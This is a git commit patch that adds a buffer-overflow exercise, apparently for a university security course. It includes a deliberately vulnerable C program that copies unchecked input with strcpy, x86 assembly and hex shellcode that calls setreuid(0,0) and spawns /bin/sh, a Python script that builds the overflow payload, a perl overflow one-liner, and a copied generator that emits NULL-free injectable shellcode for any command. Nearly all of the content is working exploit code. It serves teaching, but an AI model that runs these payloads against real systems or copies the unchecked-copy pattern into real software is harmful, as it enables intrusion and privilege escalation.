From 45ec0c7e1bfd251e13f4d3ade89785e98df31ba9 Mon Sep 17 00:00:00 2001
From: Guillermo Ramos
Date: Mon, 27 May 2013 00:07:01 +0200
Subject: start

---
 c_seguridad/code/bof/.chuleta.txt                |  1 +
 c_seguridad/code/bof/exit.asm                    |  8 +++
 c_seguridad/code/bof/exploit.py                  | 23 ++++++++
 c_seguridad/code/bof/exploitable.c               | 14 +++++
 c_seguridad/code/bof/shellcode                   |  1 +
 c_seguridad/code/bof/shellcodeGen/shellcodeGen.c | 73 ++++++++++++++++++++++++
 c_seguridad/code/bof/shellex.asm                 | 25 ++++++++
 c_seguridad/code/bof/test.c                      | 15 +++++
 8 files changed, 160 insertions(+)
 create mode 100644 c_seguridad/code/bof/.chuleta.txt
 create mode 100644 c_seguridad/code/bof/exit.asm
 create mode 100755 c_seguridad/code/bof/exploit.py
 create mode 100644 c_seguridad/code/bof/exploitable.c
 create mode 100644 c_seguridad/code/bof/shellcode
 create mode 100755 c_seguridad/code/bof/shellcodeGen/shellcodeGen.c
 create mode 100644 c_seguridad/code/bof/shellex.asm
 create mode 100644 c_seguridad/code/bof/test.c

(limited to 'c_seguridad/code/bof')
diff --git a/c_seguridad/code/bof/.chuleta.txt b/c_seguridad/code/bof/.chuleta.txt
new file mode 100644
index 0000000..b5ddbf3
--- /dev/null
+++ b/c_seguridad/code/bof/.chuleta.txt
@@ -0,0 +1 @@
+Exploitable (repetir funciÃ³n): perl -e 'print "A"x72 . "\xd4\x83\x04\x08"'
diff --git a/c_seguridad/code/bof/exit.asm b/c_seguridad/code/bof/exit.asm
new file mode 100644
index 0000000..1ee5f18
--- /dev/null
+++ b/c_seguridad/code/bof/exit.asm
@@ -0,0 +1,8 @@
+SECTION .text
+global _start
+_start:
+	xor		eax, eax
+	mov		al, 1
+	xor		ebx, ebx
+	mov		bl, 123
+	int		0x80
diff --git a/c_seguridad/code/bof/exploit.py b/c_seguridad/code/bof/exploit.py
new file mode 100755
index 0000000..5219755
--- /dev/null
+++ b/c_seguridad/code/bof/exploit.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python2
+# -*- coding: utf-8 -*-
+
+from time import sleep
+from os import system
+
+
+shellcode = (
+    # Buffer offset
+    "\x90"*17 +
+
+	# Shellcode (55 chars)
+	"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b"
+	"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
+	"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
+	"\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"
+
+    "\xf8\xf7\xff\xbf"
+    )
+
+cmd = "./exploitable " + shellcode
+
+print shellcode
diff --git a/c_seguridad/code/bof/exploitable.c b/c_seguridad/code/bof/exploitable.c
new file mode 100644
index 0000000..5492a29
--- /dev/null
+++ b/c_seguridad/code/bof/exploitable.c
@@ -0,0 +1,14 @@
+#include <string.h>
+#include <stdio.h>
+
+void vulnerable(char* str) {
+	printf("Entrando en vulnerable...\n");
+	char arr[60];
+	strcpy(arr, str);
+}
+
+int main(int argc, char** argv) {
+	if (argc > 1)
+		vulnerable(*(argv+1));
+	return 0;
+}
diff --git a/c_seguridad/code/bof/shellcode b/c_seguridad/code/bof/shellcode
new file mode 100644
index 0000000..e36a2c5
--- /dev/null
+++ b/c_seguridad/code/bof/shellcode
@@ -0,0 +1 @@
+1À°F1Û1ÉÍ€ë1À[ˆC‰[‰C°KSÍ€èåÿÿÿ/bin/shNAAAABBBBø÷ÿ¿
diff --git a/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c
new file mode 100755
index 0000000..0221f48
--- /dev/null
+++ b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c
@@ -0,0 +1,73 @@
+/**
+ *
+ * BlackLight's shellcode generator for Linux x86
+ * Tested anywhere, working & NULL-free
+ *
+ * Usage: ./generator <cmd>
+ * ...and then you've got a ready2inject NULL-free shellcode for the command you like
+ *
+ * copyleft 2008 by BlackLight <blacklight[at]autistici.org>
+ * < http://blacklight.gotdns.org >
+ *
+ * Released under GPL v.3 licence
+ *
+ * Greetz to: evilsocket, for the idea he gave me  ;) 
+ * Greetz to: my friends, who tested, used and appreciated this code and helped
+ *      me to improve it to what it is now
+ * Greetz to: my girl, next to me in any moment even if she had no idea
+ *      about what I was doing ^^
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+char code[] =
+      "\\x60"                        /*pusha*/
+      "\\x31\\xc0"                   /*xor    %eax,%eax*/
+      "\\x31\\xd2"                   /*xor    %edx,%edx*/
+      "\\xb0\\x0b"                   /*mov    $0xb,%al*/
+      "\\x52"                        /*push   %edx*/
+      "\\x68\\x6e\\x2f\\x73\\x68"    /*push   $0x68732f6e*/
+      "\\x68\\x2f\\x2f\\x62\\x69"    /*push   $0x69622f2f*/
+      "\\x89\\xe3"                   /*mov    %esp,%ebx*/
+      "\\x52"                        /*push   %edx*/
+      "\\x68\\x2d\\x63\\x63\\x63"    /*push   $0x6363632d*/
+      "\\x89\\xe1"                   /*mov    %esp,%ecx*/
+      "\\x52"                        /*push   %edx*/
+      "\\xeb\\x07"                   /*jmp   804839a <cmd>*/
+      "\\x51"                        /*push   %ecx*/
+      "\\x53"                        /*push   %ebx*/
+      "\\x89\\xe1"                   /*mov    %esp,%ecx*/
+      "\\xcd\\x80"                   /*int    $0x80*/
+      "\\x61"                        /*popa*/
+      "\\xe8\\xf4\\xff\\xff\\xff"    /*call  8048393 <l1>*/;
+
+int main (int argc, char **argv)  {
+      int i,len=0;
+      char *shell,*cmd;
+
+      if (!argv[1])
+              exit(1);
+
+      for (i=1; i<argc; i++)
+              len += strlen(argv[i]);
+      len += argc;
+
+      cmd = (char*) malloc(len);
+
+      for (i=1; i<argc; i++)  {
+              strcat (cmd,argv[i]);
+              strcat (cmd,"\x20");
+      }
+
+      cmd[strlen(cmd)-1]=0;
+      shell = (char*) malloc( sizeof(code) + (strlen(argv[1]))*5 + 1 );
+      memcpy (shell,code,sizeof(code));
+
+      for (i=0; i<strlen(cmd); i++)
+              sprintf (shell,"%s\\x%.2x",shell,cmd[i]);
+      printf ("%s\n",shell);
+}
+
+// milw0rm.com [2008-08-19]
\ No newline at end of file
diff --git a/c_seguridad/code/bof/shellex.asm b/c_seguridad/code/bof/shellex.asm
new file mode 100644
index 0000000..00968ea
--- /dev/null
+++ b/c_seguridad/code/bof/shellex.asm
@@ -0,0 +1,25 @@
+SECTION .text
+global _start
+_start:
+	xor		eax, eax
+	mov		al, 70
+	xor		ebx, ebx
+	xor		ecx, ecx
+	int		0x80
+
+	jmp short ender
+
+starter:
+	xor		eax, eax
+	pop		ebx
+	mov		[ebx+7], al
+	mov		[ebx+8], ebx
+	mov		[ebx+12], eax
+	mov		al, 11
+	lea		ecx, [ebx+8]
+	lea		edx, [ebx+12]
+	int		0x80
+
+ender:
+	call starter
+	db "/bin/shNAAAABBBB"
diff --git a/c_seguridad/code/bof/test.c b/c_seguridad/code/bof/test.c
new file mode 100644
index 0000000..c88c260
--- /dev/null
+++ b/c_seguridad/code/bof/test.c
@@ -0,0 +1,15 @@
+char shellcode[] =
+"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b"
+"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
+"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
+"\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";
+
+//char shellcode[] =
+//"\x31\xc0\xb0\x01\x31\xdb\xb3\x7b\xcd\x80";
+
+
+int main() {
+	int (*func)();
+	func = (int (*)()) shellcode;
+	(*func)();
+}
-- 
cgit v1.2.3

